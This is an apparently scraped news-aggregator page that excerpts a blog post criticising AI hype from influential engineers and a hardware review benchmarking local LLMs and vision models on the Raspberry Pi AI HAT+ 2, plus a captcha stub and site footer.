This re­sponse thread re­vealed a story far less mirac­u­lous than the orig­i­nal tweet sug­gested. Let’s an­a­lyze it.

Crucially, the foun­da­tional thinking” had al­ready been per­formed by Rakyll her­self, who guided the AI us­ing ar­chi­tec­tural con­cepts (honed over sev­eral weeks or months of prior ef­fort) rather than the AI think­ing and in­vent­ing the product” from scratch.

Furthermore, the re­sult­ing pro­ject was strictly a proof-of-con­cept that falls far short of a pro­duc­tion-ready sys­tem ca­pa­ble of man­ag­ing real-world com­plex­ity.

And fi­nally, this suc­cess hinged on the Rakyll’s im­plicit do­main knowl­edge and deep ex­per­tise. The last point is of­ten (strategically?) omit­ted from these magic” vi­ral demon­stra­tions in or­der to make the tool ap­pear way more au­tonomous than it truly is.

Hmm. Now, this is far less ex­cit­ing…

This pat­tern of hype first and con­text later” is ac­tu­ally part of a grow­ing trend.

I call the in­di­vid­u­als par­tic­i­pat­ing to that trend The Influentists”. Those peo­ple are mem­bers of a sci­en­tific or tech­ni­cal com­mu­nity, and lever­age their large au­di­ences to prop­a­gate claims that are, at best, un­proven and, at worst, in­ten­tion­ally mis­lead­ing.

But how can we spot them?

I per­son­ally iden­tify these Influentists” by four per­son­al­ity traits that char­ac­ter­ize their pub­lic dis­course.

The first is a re­liance on trust-me-bro” cul­ture, where anec­do­tal ex­pe­ri­ences are framed as uni­ver­sal, ob­jec­tive truths to gen­er­ate hype. This is a sen­ti­ment per­fectly cap­tured by the I’m not jok­ing and this is­n’t funny” tone of Rakyll’s orig­i­nal tweet, but also the dra­matic I’ve never felt that much be­hind as a pro­gram­mer” from Andrej Karpathy’s tweet. This is sup­ported by an ab­sence of re­pro­ducible proof, as these in­di­vid­u­als rarely share the code, data, or method­ol­ogy be­hind their vi­ral wins”, an omis­sion made eas­ier than ever in the cur­rent LLM era. And fi­nally, they uti­lize strate­gic am­bi­gu­ity, care­fully word­ing their claims with enough vague­ness to pivot to­ward a clarification” if the tech­ni­cal com­mu­nity chal­lenges their ac­cu­racy.

I’ve never felt this much be­hind as a pro­gram­mer. The pro­fes­sion is be­ing dra­mat­i­cally refac­tored as the bits con­tributed by the pro­gram­mer are in­creas­ingly sparse and be­tween. I have a sense that I could be 10X more pow­er­ful if I just prop­erly string to­gether what has be­come…— Andrej Karpathy (@karpathy) December 26, 2025

Rakyll is far from alone. We see this hype-first” ap­proach across ma­jor AI firms like Anthropic, OpenAI, or Microsoft.

Consider Galen Hunt, a Distinguished Engineer at Microsoft. He re­cently made waves by claim­ing a goal to rewrite Microsoft’s mas­sive C/C++ code­bases into Rust by 2030 us­ing AI.

When the in­dus­try pointed out the near-im­pos­si­ble com­plex­ity of this task, but also ask­ing clar­ity for pop­u­lar and crit­i­cal prod­ucts like Microsoft Windows, he was forced to clar­ify that it was only a research pro­ject”.

Similarly, en­gi­neers from Anthropic and OpenAI of­tenly post teasers about AGI be­ing achieved in­ter­nally” to re­lease months later mod­els that dis­ap­point the crowd.

Wait, can we con­sider se­ri­ously the hy­poth­e­sis that 1) the re­cent hyped tweets from OAs staff

2) AGI has been achieved in­ter­nally”

3) sama’s com­ments on the qual­i­fi­ca­tion of slow or fast take­off hing­ing on the date you count from

4) sama’s com­ments on 10000x re­searchers

are… https://​t.co/​f57g7dXMhM pic.twit­ter.com/​Gap3V7VqkK— Siméon (@Simeon_Cps) September 24, 2023

Liam, I have been a pro­fes­sional pro­gram­mer for 36 years. I spent 11 years at Google, where I ended up as a Staff Software Engineer, and now work at Anthropic. I’ve worked with some in­cred­i­ble peo­ple - you might have heard of Jaegeuk Kim or Ted Ts’o - and some ridicu­lously… https://​t.co/​Ku8agTrps3— Paul Crowley (@ciphergoth) December 31, 2025

Similarly, many other com­pa­nies lie over what they are solv­ing or will­ing to solve:

When lead­ers at ma­jor labs prop­a­gate these hyped-based re­sults, it can cre­ate a technical debt of ex­pec­ta­tions” for the rest of us. Junior de­vel­op­ers see these vi­ral threads and feel they are fail­ing be­cause they can’t re­pro­duce a year of work in an hour, not re­al­iz­ing the magic” was ac­tu­ally a highly-cu­rated pro­to­type guided by a decade of hid­den ex­per­tise.

We must stop grant­ing au­to­matic au­thor­ity to those who rely on hype, or vibes, rather than ev­i­dence.

If a tool or method­ol­ogy were truly as rev­o­lu­tion­ary as claimed, then it would­n’t need a vi­ral thread to prove its worth be­cause the re­sults would speak for them­selves.

The tech com­mu­nity must shift its ad­mi­ra­tion back to­ward re­pro­ducible re­sults and away from this trust-me-bro” cul­ture.

...

Read the original on carette.xyz »

9 230 shares, 19 trendiness

Raspberry Pi's new AI HAT adds 8GB of RAM for local LLMs

Today Raspberry Pi launched their new $130 AI HAT+ 2 which in­cludes a Hailo 10H and 8 GB of LPDDR4X RAM.

With that, the Hailo 10H is ca­pa­ble of run­ning LLMs en­tirely stand­alone, free­ing the Pi’s CPU and sys­tem RAM for other tasks. The chip runs at a max­i­mum of 3W, with 40 TOPS of INT8 NPU in­fer­ence per­for­mance in ad­di­tion to the equiv­a­lent 26 TOPS INT4 ma­chine vi­sion per­for­mance on the ear­lier AI HAT with Hailo 8.

In prac­tice, it’s not as amaz­ing as it sounds.

You still can’t up­grade the RAM on the Pi, but at least this way if you do have a need for an AI co­proces­sor, you don’t have to eat up the Pi’s mem­ory to run things on it.

And it’s a lot cheaper and more com­pact than run­ning an eGPU on a Pi. In that sense, it’s more use­ful than the silly NPUs Microsoft forces into their AI PCs’.

But it’s still a so­lu­tion in search of a prob­lem, in all but the most niche of use cases.

Besides feel­ing like I’m liv­ing in the world of the Turbo Encabulator every time I’m test­ing AI hard­ware, I find the mar­ket­ing of these things to be very vague, and the ap­pli­ca­tions not very broad.

For ex­am­ple, the Hailo 10H is ad­ver­tised as be­ing used for a Fujitsu demo of au­to­matic shrink de­tec­tion for a self-check­out.

That’s cer­tainly not a worth­less use case, but it’s not some­thing I’ve ever needed to do. I have a feel­ing this board is meant more for de­vel­op­ment, for peo­ple who want to de­ploy the 10H in other de­vices, rather than as a to­tal so­lu­tion to prob­lems in­di­vid­ual Pi own­ers need to solve.

Especially when it comes to the head­line fea­ture: run­ning in­fer­ence, like with LLMs.

I also pub­lished a video with all the in­for­ma­tion in this blog post, but if you en­joy text more than video, scroll on past—it does­n’t of­fend me!

I ran every­thing on an 8 gig Pi 5, so I could get an ap­ples-to-ap­ples com­par­i­son, run­ning the same mod­els on the Pi’s CPU as I did on the AI HATs NPU.

They both have the same 8GB LPDDR4X RAM con­fig­u­ra­tion, so ide­ally, they’d have sim­i­lar per­for­mance.

I tested every model Hailo put out so far, and com­pared them, Pi 5 ver­sus Hailo 10H:

The Hailo is only close, re­ally, on Qwen2.5 Coder 1.5B.

It is slightly more ef­fi­cient in most cases:

But look­ing more closely at power draw, we can see why the Hailo does­n’t keep up:

The Pi’s CPU is al­lowed to max out it’s power lim­its (10W on the SoC), which are a lot higher than the Hailo’s (3W).

So power holds it back, but the 8 gigs of RAM holds back the LLM use case (vs just run­ning on the Pi’s CPU) the most. The Pi 5 can be bought in up to a 16 GB con­fig­u­ra­tion. That’s as much as you get in de­cent con­sumer graph­ics cards.

Because of that, many quan­tized medium-size mod­els tar­get 10-12 GB of RAM us­age (leaving space for con­text, which eats up an­other 2+ GB of RAM).

A cou­ple weeks ago, ByteShape got Qwen3 30B A3B Instruct to fit on a 16GB Pi 5. Now this post is­n’t about LLMs, but the short of it is they found a novel way to com­press the model to fit in 10 GB of RAM.

A lit­tle bit of qual­ity is lost, but like a JPEG, it’s still good enough to ace all the con­trived tests (like build­ing a TODO list app, or sort­ing a com­plex list) that the tiny mod­els I ran on the Hailo 10H did­n’t com­plete well (see the video ear­lier in this post for de­tails).

To test the 30B model, I in­stalled llama.cpp fol­low­ing this guide from my blog, and down­loaded the com­pressed model.

I asked it to gen­er­ate a sin­gle page TODO list app, and it’s still not a speed de­mon (this is a Pi CPU with LPDDR4x RAM we’re talk­ing about), but af­ter a lit­tle while, it gave me this:

It met all my re­quire­ments:

* I can type in as many items as I want

* I can drag them around to re­arrange them

* I can check off items and they go to the bot­tom of the list…

It’s hon­estly crazy how many small tasks you can do even with free lo­cal mod­els… even on a Pi. Natural Language Programming was just a dream back when I started my ca­reer.

Besides be­ing an­gry Google, OpenAI, Anthropic and all these other com­pa­nies are con­sum­ing all the world’s money and re­sources do­ing this stuff—not to men­tion de­stroy­ing the ca­reers of thou­sands of ju­nior de­vel­op­ers—it is kinda neat to see NLP work for very tightly de­fined ex­am­ples.

But I don’t think this HAT is the best choice to run lo­cal, pri­vate LLMs (at least not as a pri­mary goal).

What it is good for, is vi­sion pro­cess­ing. But the orig­i­nal AI HAT was good for that too!

In my test­ing, Hailo’s hailo-rpi5-ex­am­ples were not yet up­dated for this new HAT, and even if I spec­i­fied the Hailo 10H man­u­ally, model files would not load, or I ran into er­rors once the board was de­tected.

But Raspberry Pi’s mod­els ran, so I tested them with a Camera Module 3:

I pointed it over at my desk, and it was able to pick out things like my key­board, my mon­i­tor (which it thought was a TV), my phone, and even the mouse tucked away in the back.

It all ran quite fast—and 10x faster than on the Pi’s CPU—but the prob­lem is I can do the same thing with the orig­i­nal AI HAT ($110)—or the AI Camera ($70).

If you just need vi­sion pro­cess­ing, I would stick with one of those.

The head­line fea­ture of the AI HAT+ 2 is the abil­ity to run in a mixed’ mode, where it can process ma­chine vi­sion (frames from a cam­era or video feed), while also run­ning in­fer­ence (like an LLM or text-to-speech).

Unfortunately, when I tried run­ning two mod­els si­mul­ta­ne­ously, I ran into seg­men­ta­tion faults or device not ready’, and lack­ing any work­ing ex­am­ples from Hailo, I had to give up on get­ting that work­ing in time for this post.

Just like the orig­i­nal AI HAT, there’s some grow­ing pains.

It seems like with most hard­ware with AI in the name, it’s hard­ware-first, then soft­ware comes later—if it comes at all. At least with Raspberry Pi’s track record, the soft­ware does come, it’s just… of­ten the so­lu­tions are only use­ful in tiny niche use cases.

8 GB of RAM is use­ful, but it’s not quite enough to give this HAT an ad­van­tage over just pay­ing for the big­ger 16GB Pi with more RAM, which will be more flex­i­ble and run mod­els faster.

The main use case for this HAT might be in power-con­strained ap­pli­ca­tions where you need both vi­sion pro­cess­ing and in­fer­enc­ing. But even there… it’s hard to say yes, buy this thing”, be­cause for just a few more watts, the Pi could achieve bet­ter per­for­mance for in­fer­ence in tan­dem with the $70 AI Camera or the $110 AI HAT+ for the vi­sion pro­cess­ing.

Outside of run­ning tiny LLMs in less than 10 watts, maybe the idea is you use the AI HAT+ 2 as a de­vel­op­ment kit for de­sign­ing de­vices us­ing the 10H like self-check­out scan­ners (which might not even run on a Pi)? I’m not sure.

...

Read the original on www.jeffgeerling.com »

10 221 shares, 8 trendiness

WebTiles

Please com­plete the captcha to con­tinue.

...

Read the original on webtiles.kicya.net »

To add this web app to your iOS home screen tap the share button and select "Add to the Home Screen".

10HN is also available as an iOS App

If you visit 10HN only rarely, check out the the best articles from the past week.

If you like 10HN please leave feedback and share

Visit pancik.com for more.